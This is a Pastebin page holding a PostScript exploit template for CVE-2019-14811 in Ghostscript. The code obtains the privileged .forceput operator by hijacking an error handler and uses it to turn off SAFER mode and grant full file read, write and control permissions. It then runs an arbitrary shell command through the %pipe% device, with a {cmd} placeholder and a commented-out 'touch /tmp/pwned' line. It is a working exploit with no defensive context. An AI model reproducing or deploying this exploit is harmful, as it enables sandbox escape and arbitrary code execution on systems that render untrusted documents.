API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Sep 21st, 2019
107
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.49 KB | None | 0 0
raw download clone embed print report
  1. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
  2. /exploit {{
  3. /println {{ (\\n) exch print print }} bind executeonly def
  4. /info {{ ([*] ) print println }} bind executeonly def
  5. /success {{ ([+] ) print println }} bind executeonly def
  6. /fail {{ ([-] ) print println stop }} bind executeonly def
  7.  
  8. /MaxFileSize 16#10000 def
  9. /readfile {{
  10. (r) file
  11. dup MaxFileSize string readstring pop
  12. exch closefile
  13. }} bind executeonly def
  14.  
  15. /osexec {{
  16. (%pipe%) exch concatstrings readfile
  17. }} bind executeonly def
  18.  
  19. (=============================================================================)
  20. (= CVE-2019-14811 =)
  21. (=============================================================================)
  22. println println println
  23.  
  24. (Obtaining .forceput operator from .pdf_hook_DSC_Creator operator...) info
  25. /.forceput null def
  26. systemdict /.pdfdsc get 24 get /.pdf_hook_DSC_Creator exch def
  27. /typecheckcount 0 def
  28. /&typecheck errordict /typecheck get def
  29. errordict /typecheck {{
  30. /typecheckcount typecheckcount 1 add def
  31. typecheckcount 2 eq {{
  32. 1 index 2 get 8 get
  33. /.forceput exch store
  34. }} if
  35. }} put
  36. null .pdf_hook_DSC_Creator clear
  37. errordict /typecheck /&typecheck load put
  38. [
  39. /&typecheck
  40. /typecheckcount
  41. /.pdf_hook_DSC_Creator
  42. ] {{ currentdict exch undef }} forall
  43. (A candidate for .forceput operator found!) success
  44.  
  45. (Attempting sanity check with the candidate for .forceput operator...) info
  46. << /overwritten false >> readonly
  47. begin
  48. currentdict /overwritten true .forceput
  49. overwritten not {{
  50. /.forceput where {{ /.forceput undef }} if
  51. }} if
  52. end
  53. currentdict /.forceput known not {{
  54. (.forceput operator could not found...) fail
  55. }} if
  56. (Successfully got .forceput operator!) success
  57.  
  58. (Overwriting several flags to escape from Safer Mode...) info
  59. systemdict /SAFER false .forceput
  60. userparams /LockFilePermissions false .forceput
  61. userparams /PermitFileControl [(*)] .forceput
  62. userparams /PermitFileWriting [(*)] .forceput
  63. userparams /PermitFileReading [(*)] .forceput
  64. save restore
  65.  
  66. SAFER {{
  67. (Could not escape from Safer Mode.) fail
  68. }} bind executeonly if
  69. (Successfully escaped from Safer Mode!) success
  70.  
  71. (Executing a shell command...) info
  72. ({cmd}) osexec pop
  73. % (touch /tmp/pwned) osexec pop
  74. (PS: I pwned you <3) success
  75. }} def
  76. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!